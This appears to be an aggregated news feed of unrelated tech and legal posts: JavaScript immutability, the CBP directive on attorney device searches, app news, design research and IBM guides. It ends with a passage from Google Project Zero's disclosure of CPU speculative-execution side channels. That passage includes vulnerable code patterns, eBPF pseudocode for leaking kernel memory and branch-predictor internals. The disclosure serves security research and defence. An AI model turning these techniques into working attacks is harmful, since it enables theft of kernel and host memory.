Mutation is scary because it can cause your code to break without your knowing about it. Even if you suspect the cause of breakage is a mutation, it can be hard for you to pinpoint the code that created the mutation. So the best way to prevent code from breaking unknowingly is to make sure your objects don’t mutate from the get-go.

To prevent objects from mutating, you can use libraries like ImmutableJS and Mori.js, or use Object.assign and Object.freeze.

Take note that Object.assign and Object.freeze can only prevent direct properties from mutating. If you need to prevent multiple layers of objects from mutating, you’ll need libraries like assignment and deep-freeze.

Categories: Technology

New Customs and Border Protection policy on searching attorney iPhones

iPhone J.D. - Mon, 01/08/2018 - 22:51

In mid-2017, I discussed some of the risks associated with attorneys bringing an iPhone or iPad when traveling internationally because U.S. customs agents have been demanding to search mobile devices upon reentry into the country.  Yesterday, Sophia Cope and Aaron Mackey, staff attorneys with the Electronic Frontier Foundation (EFF), reported that Customs and Border Protection (CBP) has released a new directive:  CBP Directive No. 3340-049A (Jan. 4, 2018) titled Border Search of Electronic Devices.  The full EFF report provides details on how this affects all U.S. citizens, but today I want to focus on one small part of the new directive, the part that deals with privileged information on an attorney's iPhone or iPad.

Under the new directive (which you can download here in PDF format), there are now new procedures that a border patrol agent must use when confronted with data protected by the attorney-client privilege or work product.  The good news is that once an attorney asserts the privilege, the CBP Associate/Assistant Chief Counsel office needs to get involved; the border patrol agent cannot decide on his own to ignore the assertion of privilege.  Having said that, it looks like the attorney needs to all but provide a full privilege log to CBP, and even then it is unclear how CBP will deal with the privileged information.  The policy says that it will be "handled appropriately while also ensuring that CBP accomplishes its critical border security mission."  Section 5.2.1.2.  Here is the new policy:

5.2 Review and Handling of Privileged or Other Sensitive Material

5.2.1    Officers encountering information they identify as, or that is asserted to be, protected by the attorney-client privilege or attorney work product doctrine shall adhere to the following procedures.

5.2.1.1    The Officer shall seek clarification, if practicable in writing, from the individual asserting this privilege as to specific files, file types, folders, categories of files, attorney or client names, email addresses, phone numbers, or other particulars that may assist CBP in identifying privileged information.

5.2.1.2    Prior to any border search of files or other materials over which a privilege has been asserted, the Officer will contact the CBP Associate/Assistant Chief Counsel office.  In coordination with the CBP Associate/Assistant Chief Counsel office, which will coordinate with the U.S. Attorney's Office as needed, Officers will ensure the segregation of any privileged material from other information examined during a border search to ensure that any privileged material is handled appropriately while also ensuring that CBP accomplishes its critical border security mission. This segregation process will occur through the establishment of a Filter Team composed of legal and operational representatives, or through another appropriate measure with written concurrence of the CBP Associate/Assistant Chief Counsel office.

5.2.1.3    At the completion of the CBP review, unless any materials are identified that indicate an imminent threat to homeland security, copies of materials maintained by CBP and determined to be privileged will be destroyed, except for any copy maintained in coordination with the CBP Associate/Assistant Chief Counsel office solely for purposes of complying with a litigation hold or other requirement of law.

5.2.2    Other possibly sensitive information, such as medical records and work-related information carried by journalists, shall be handled in accordance with any applicable federal law  and CBP policy. Questions regarding the review of these materials shall be directed to the CBP Associate/Assistant Chief Counsel office, and this consultation shall be noted in appropriate CBP systems.

5.2.3    Officers encountering business or commercial information in electronic devices shall treat such information as business confidential information and shall protect that information from unauthorized disclosure. Depending on the nature of the information presented, the Trade Secrets Act, the Privacy Act, and other laws, as well as CBP policies, may govern or restrict the handling of the information. Any questions regarding the handling of business or commercial information may be directed to the CBP Associate/Assistant Chief Counsel office or the CBP Privacy Officer, as appropriate.

5.2.4    Information that is determined to be protected by law as privileged or sensitive will only be shared with agencies or entities that have mechanisms in place to protect appropriately such information, and such information will only be shared in accordance with this Directive.

I'm glad to see that CBP is acknowledging that there is a need to provide heightened protection for confidential information on an attorney's mobile device.  However, any attorney dealing with this new provision will need to do a lot of work, and if you have a short window before your connecting flight, I suspect that you are going to miss that connection.

Categories: iPhone Web Sites

IBM FlashSystem A9000 and A9000R, IBM XIV, and IBM Spectrum Accelerate with IBM SAN Volume Controller Best Practices

IBM Redbooks Site - Mon, 01/08/2018 - 08:30
Redpaper, published: Mon, 8 Jan 2018

This IBM® Redpaper™ publication describes preferred practices for attaching members of the IBM Spectrum™ Accelerate family, including the IBM XIV® Gen3 Storage System, IBM FlashSystem® A9000, IBM FlashSystem A9000R, and other IBM Spectrum Accelerate™ based deployments, to either an IBM System Storage® SAN Volume Controller or IBM Storwize® V7000 system.

Categories: Technology

In the news

iPhone J.D. - Fri, 01/05/2018 - 01:05

Happy New Year!  I hope that you and your family had a wonderful holiday season. and have managed to stay warm during this crazy cold weather.  I know that Apple and many app developers certainly enjoyed the season because Apple announced yesterday that the App Store had a record-breaking holiday season.  There were $300 million in purchases on New Year's Day, and $890 million in purchases during the week starting on Christmas Eve.  Apple VP Phil Schiller announced that "[i]n 2017 alone, iOS developers earned $26.5 billion — more than a 30 percent increase over 2016."  And since the App Store launched in July 2008, iOS developers have earned over $86 billion.  And now, the news items of note from the end of the year and early 2018:

  • California attorney David Sparks reviews Best Photos, an app that can help you to sort and prune throught he photos on your iPhone.
  • Sparks also discusses iCloud syncing.  Sparks mentioned on a recent Mac Power Users podcast that he is now relying almost exclusively on iCloud for his document management, with just rare use of Dropbox.
  • For a very long time (well over a year), my favorite iPhone weather app was Weather Line.  A few months ago I changed to Carrot Weather, which I really like (not only on the iPhone, but also on the Apple Watch where Carrot Weather is my favorite third party Apple Watch app).  However, Zac Hall of 9to5Mac reports that Weather Line was updated this week and now supports the iPhone X, so I'll have to check in again on that old favorite.
  • Jon Chase of Wirecutter has a round up of some of the best HomeKit-compatible smart-home devices.  There are quite a few good ones on that list, but my personal favorite is the Lutron Caséta line.
  • Cliff Kuang of Fast Company Design discusses the 12,000 chairs that Apple purchased for its new Apple Park campus.
  • John Gruber of Daring Fireball discusses ways that Apple can improve the feature where you press the side button on an iPhone X to confirm a purchase.
  • Gruber also has a good overview of what makes the iPhone X so amazing.
  • Here is iMore's roundup of the best devices, accessories and apps of 2017.
  • Jason Snell of Six Colors explains how to use Workflow (on an iPhone) and Hazel (on a Mac) to turn your iPhone into a remote control for your Mac.
  • If you are planning a trip to New Orleans this year, Brett Anderson, food critic for the Times-Picayune, posted his 10 favorite restaurants in New Orleans for 2018.  It's a fabulous list, and Commander's Palace is my #1 choice.  But picking just 10 means that he left off many other great ones — Galatoire's, Shaya, Dante's Kitchen, Emeril's, Meril, Restaurant August, and many more that I won't name because now I'm getting hungry.
  • And finally, it has been a long time since I have watched one of the drone videos of the new Apple Park campus, and Matthew Roberts made one just a few weeks ago that is of really high quality and shows off a lot of features that I hadn't seen yet:

Categories: iPhone Web Sites

Discovery on a Budget: Part I

A list Apart development site - Thu, 01/04/2018 - 10:00

If you crack open any design textbook, you’ll see some depiction of the design cycle: discover, ideate, create, evaluate, and repeat. Whenever we bring on a new client or start working on a new feature, we start at the top of the wheel with discover (or discovery). It is the time in the project when we define what problem we are trying to solve and what our first approach at solving it should be.

Ye olde design cycle

We commonly talk about discovery at the start of a sprint cycle at an established business, where there are things like budgets, product teams, and existing customers. The discovery process may include interviewing stakeholders or pouring over existing user data. And we always exit the discovery phase with some sort of idea to move forward with.

However, discovery is inherently different when you work at a nonprofit, startup, or fledgling small business. It may be a design team of one (you), with zero dollars to spend, and only a handful of people aware the business even exists. There are no clients to interview and no existing data to examine. This may also be the case at large businesses when they want to test the waters on a new direction without overcommitting (or overspending). Whenever you are constrained on budget, data, and stakeholders, you need to be flexible and crafty in how you conduct discovery research. But you can’t skimp on rigor and thoroughness. If the idea you exit the discovery phase with isn’t any good, your big launch could turn out to be a business-ending flop.

In this article I’ll take you through a discovery research cycle, but apply it towards a (fictitious) startup idea. I’ll introduce strategies for conducting discovery research with no budget, existing user data, or resources to speak of. And I’ll show how the research shapes the business going forward.

Write up the problem hypothesis

An awful lot of ink (virtual or otherwise) has been spent on proclaiming we should all, “fall in love with the problem, not the solution.” And it has been ink spent well. When it comes to product building, a problem-focused philosophy is the cornerstone of any user-centric business.

But how, exactly, do you know when you have a problem worth solving? If you work at a large, established business you may have user feedback and data pointing you like flashing arrows on a well-marked road towards a problem worth solving. However, if you are launching a startup, or work at a larger business venturing into new territory, it can be more like hiking through the woods and searching for the next blaze mark on the trail. Your ideas are likely based on personal experiences and gut instincts.

When your ideas are based on personal experiences, assumptions, and instincts, it’s important to realize they need a higher-than-average level of tire-kicking. You need to evaluate the question “Do I have a problem worth solving?” with a higher level of rigor than you would at a company with budget to spare and a wealth of existing data. You need to take all of your ideas and assumptions and examine them thoroughly. And the best way to examine your ideas and categorize your assumptions is with a hypothesis.

As the dictionary describes, a hypothesis is “a supposition or proposed explanation made on the basis of limited evidence as a starting point for further investigation.” That also serves as a good description of why we do discovery research in the first place. We may have an idea that there is a problem worth solving, but we don’t yet know the scope or critical details. Articulating our instincts, ideas, and assumptions as a problem hypothesis lays a foundation for the research moving forward.

Here is a general formula you can use to write a problem hypothesis:

Because [assumptions and gut instincts about the problem], users are [in some undesirable state]. They need [solution idea].

For this article, I decided to “launch” a fictitious (and overly ambitious) startup as an example. Here is the problem hypothesis I wrote for my startup:

Because their business model relies on advertising, social media tools like Facebook are deliberately designed to “hook” users and make them addicted to the service. Users are unhappy with this and would rather have a healthier relationship with social media tools. They would be willing to pay for a social media service that was designed with mental health in mind.

You can see in this example that my assumptions are:

  • Users feel that social media sites like Facebook are addictive.
  • Users don’t like to be addicted to social media.
  • Users would be willing to pay for a non-addictive Facebook replacement.

These are the assumptions I’ll be researching and testing throughout the discovery process. If I find through my research that I cannot readily affirm these assumptions, it means I might not be ready to take on Mr. Zuckerberg just yet.

The benefit of articulating our assumptions in the form of a hypothesis is that it provides something concrete to talk about, refer to, and test. The whole product team can be involved in forming the initial problem hypothesis, and you can refer back to it throughout the discovery process. Once we’ve completed the research and analyzed the results, we can edit the hypothesis to reflect our new understanding of our users and the problems we want to solve.

Now that we’ve articulated a problem hypothesis, it is time to figure out our research plan. In the following two sections, I’ll cover the research method I recommend the most for new ventures, as well as strategies for recruiting participants on a budget.

A method that is useful in all phases of design: interviews

In my career as a user researcher, I have used all sorts of methods. I’ve done A/B testing, eye tracking, Wizard of Oz testing, think-alouds, contextual inquiries, and guerilla testing. But the one research method I utilize the most, and that I believe provides the most “bang for the buck,” is user interviews.

User interviews are relatively inexpensive to conduct. You don’t need to travel to a client site and you don’t need a fortune’s worth of equipment. If you have access to a phone, you can conduct an interview with participants all around the world. Yet interviews provide a wealth of information and can be used in every phase of research and design. Interviews are especially useful in discovery, because it is a method that is adaptable. As you learn more about the problem you are trying to solve, you can adapt your interview protocol to match.

To be clear, your interviewees will not tell you:

  • what to build;
  • or how to build it.

But they absolutely can tell you:

  • what problem they have;
  • how they feel about it;
  • and what the value of a solution would mean to them.

And if you know the problem, how users feels about it, and the value of a solution, you are well on your way to designing the right product.

The challenge of conducting a good user interview is making sure you ask the questions that elicit that information. Here are a couple tips:

Tip 1: always ask the following two questions:

  • “What do you like about [blank]?”
  • “What do you dislike about [blank]?”

… where you fill “[blank]” with whatever domain your future product will improve.

Your objective is to gain an understanding of all aspects of the problem your potential customers face—the bad and the good. One common mistake is to spend too much time investigating what’s wrong with the current state of affairs. Naturally, you want your product to fix all the problems your customers face. However, you also need to preserve what currently works well, what is satisfying, or what is otherwise good about how users accomplish their goals currently. So it is important to ask about both in user interviews.

For example, in my interviews I always asked, “What do you like about using Facebook?” And it wasn’t until my interview participant told me everything they enjoyed about Facebook that I would ask, “What do you dislike about using Facebook?”

Tip 2: after (nearly) every response, ask them to say more.

The goal of conducting interviews is to gain an exhaustive set of data to review and consider moving forward. That means you don’t want your participants to discuss one thing they like and dislike, you want them to tell you all the things they like and dislike.

Here is an example of how this played out in one of the interviews I conducted:

Interviewer (Me): What do you like about using Facebook?

Interviewee: I like seeing people on there that I wouldn’t otherwise get a chance to see and catch up with in real life. I have moved a couple times so I have a lot of friends that I don’t see regularly. I also like seeing the people I know do well, even though I haven’t seen them since, maybe, high school. But I like seeing how their life has gone. I like seeing their kids. I like seeing their accomplishments. It’s also a little creepy because it’s a window into their life and we haven’t actually talked in forever. But I like staying connected.

Interviewer (Me): What else do you like about it?

Interviewee: Um, well it’s also sort of a convenient way of keeping contacts. There have been a few times when I was able to message people and get in touch with people even when I don’t have their address or email in my phone. I could message them through Facebook.

Interviewer (Me): Great. Is there anything else you like about it?

Interviewee: Let me think … well I also find cool stuff to do on the weekends there sometimes. They have an events feature. And businesses, or local places, will post events and there have been a couple times where I’ve gone to something cool. Like I found a cool movie festival once that way.

Interviewer (Me): That seems cool. What else do you like about using Facebook?

Interviewee: Uh … that’s all I think I really use it for. I can’t really think of anything else. Mainly I use it just to keep in touch with people that I’ve met over the years.

From this example you can see the first feature that popped into the interviewee’s mind was their ability to keep up with friends that they otherwise wouldn’t have much opportunity to connect with anymore. That is a feature that any Facebook replacement would have to replicate. However, if I hadn’t pushed the interviewee to think of even more features they like, I might have never uncovered an important secondary feature: convenient in-app messaging. In fact, six out of the eleven people I interviewed for this project said they liked Facebook Messenger. But not a single one of them mentioned that feature first. It only came up in conversation after I probed for more.

As I continued to repeat my question, the interviewee thought of one more feature they liked: local event listings. (Five out of the eleven people I interviewed mentioned this feature.) But after that, the interviewee couldn’t think of any more features to discuss. You know you can move on to the next question in the interview when your participant starts to repeat themselves or bluntly tells you they have nothing else to say.

Recruit all around you, then document the bias

There are all sorts of ways to recruit participants for research. You can hire an agency or use a tool like UserTesting.com. But many of those paid-for options can be quite costly, and since we are working with a shoestring budget we have roughly zero dollars to spend on recruitment. We will have to be creative.

My post on Facebook to recruit volunteers. One volunteer decided to respond with a Hunger Games “I volunteer as tribute!” gif.

For my project, I decided to rely on the kindness of friends and strangers I could reach through Facebook. I posted one request for participants on my personal Facebook page, and another on the local FreeCodeCamp page. A day after I posted my request, twenty-five friends and five strangers volunteered. This type of participant recruitment method is called convenience sampling, because I was recruiting participants that were conveniently accessible to me.

Since my project involved talking to people about social media sites like Facebook, it was appropriate for my first attempt at recruiting to start on Facebook. I could be sure that everyone who saw my request uses Facebook in some form or fashion. However, like all convenience sampling, my recruitment method was biased. (I’ll explain how in just a bit.)

Bias is something that we should try—whenever possible—to avoid. If we have access to more sophisticated recruitment methods, we should use them. However, when you have a tight budget, avoiding recruitment bias is virtually impossible. In this scenario, our goals should be to:

  • mitigate bias as best we can;
  • and document all the biases we see.

For my project, I could mitigate some of the biases by using a few more recruitment methods. I could go to various neighborhoods and try to recruit participants off the street (i.e., guerilla testing). If I had a little bit of money to spend, I could hang out in various coffee shops and offer folks free coffee in exchange for ten-minute interviews. These recruitment methods also fall under the umbrella of convenience sampling, but by using a variety of methods I can mitigate some of the bias I would have from using just one of them.

Also, it is always important to reflect on and document how your sampling method is biased. For my project, I wrote the following in my notes:

All of the people I interviewed were connected to me in some way on Facebook. Many of them I know well enough to be “friends” with. All of them were around my age, many (but not all) worked in tech in some form or fashion, and all of them but one lived in the US.

Documenting bias ensures that we won’t forget about the bias when it comes time to analyze and discuss the results.

Let’s keep this going

As the title suggests, this is just the first installment of a series of articles on the discovery process. In part two, I will analyze the results of my interviews, revise my problem hypothesis, and continue to work on my experimental startup. I will launch into another round of discovery research, but this time utilizing some different research methods, like A/B testing and fake-door testing. You can help me out by checking out this mock landing page for Candor Network (what I’ve named my fictitious startup) and taking the survey you see there.

Categories: Technology

IBM QRadar Version 7.3 Planning and Installation Guide

IBM Redbooks Site - Thu, 01/04/2018 - 08:30
Redbook, published: Thu, 4 Jan 2018

With the advances of technology and the reoccurrence of data leaks, cyber security is a bigger challenge than ever before.

Categories: Technology

Reading privileged memory with a side-channel

Google Project Zero - Wed, 01/03/2018 - 17:27
Posted by Jann Horn, Project Zero

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.
Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].
So far, there are three known variants of the issue:
  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

During the course of our research, we developed the following proofs of concept (PoCs):
  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

For interesting resources around this topic, look down into the "Literature" section.
A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.
We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.
The PoC code and the writeups that we sent to the CPU vendors will be made available at a later date.Tested Processors
  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)
Glossaryretire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.
logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.
cached/uncached data: In this blogpost, "uncached" data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.
speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.
mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.Variant 1: Bounds check bypassThis section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:
  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.Theoretical explanationThe Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 ("Branch Prediction"):
Branch prediction predicts the branch target and enables theprocessor to begin executing instructions long before the branchtrue execution path is known.
In section 2.3.5.2 ("L1 DCache"):
Loads can:[...]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

Intel's Software Developer's Manual [7] states in Volume 3A, section 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors"):
Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).
struct array {  unsigned long length;  unsigned char data[];};struct array *arr1 = ...;unsigned long untrusted_offset_from_caller = ...;if (untrusted_offset_from_caller < arr1->length) {  unsigned char value = arr1->data[untrusted_offset_from_caller];  ...}However, in the following code sample, there's an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:
  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {  unsigned long length;  unsigned char data[];};struct array *arr1 = ...; /* small array */struct array *arr2 = ...; /* array of size 0x400 *//* >0x400 (OUT OF BOUNDS!) */unsigned long untrusted_offset_from_caller = ...;if (untrusted_offset_from_caller < arr1->length) {  unsigned char value = arr1->data[untrusted_offset_from_caller];  unsigned long index2 = ((value&1)*0x100)+0x200;  if (index2 < arr2->length) {    unsigned char value2 = arr2->data[index2];  }}
After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.
To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.
A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.Attacking the kernelThis section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.
The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:
  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.
Whether the JIT engine is enabled depends on a run-time configuration setting - but at least on the tested Intel processor, the attack works independent of that setting.
Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.
eBPF's data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.
Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn't be a precondition in principle).
Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array's length to be slow on other physical CPU cores (intentional false sharing).
The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.
Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.


This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.
When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.


The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.
At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:
uint64_t bitmask = <runtime-configurable>;uint64_t bitshift_selector = <runtime-configurable>;uint64_t prog_array_base_offset = <runtime-configurable>;uint64_t secret_data_offset = <runtime-configurable>;// index will be bounds-checked by the runtime,// but the bounds check will be bypassed speculativelyuint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);// select a single bit, move it to a specific position, and add the base offsetuint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;bpf_tail_call(prog_map, progmap_index);
This program reads 8-byte-aligned 64-bit values from an eBPF data array "victim_map" at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.
This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.Variant 2: Branch target injectionThis section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian's distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.BasicsPrior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other's branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).


The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won't know the true destination of the jump, and it won't be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.Haswell branch prediction internalsSome of the internals of the branch prediction implemented by Intel's processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.
This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.
Haswell seems to have multiple branch prediction mechanisms that work very differently:
  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
Generic predictorThe generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn't store the full, absolute destination address.
Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:
bit Abit B0x40.00000x20000x80.00000x40000x100.00000x80000x200.00000x1.00000x400.00000x2.00000x800.00000x4.00000x2000.00000x10.00000x4000.00000x20.0000
In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can't distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.
When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.
Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.Indirect call predictorThe inputs of the BTB lookup for this mechanism seem to be:
  • The low 12 bits of the address of the source instruction (we are not sure whether it's the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

If the indirect call predictor can't resolve a branch, it is resolved by the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior."
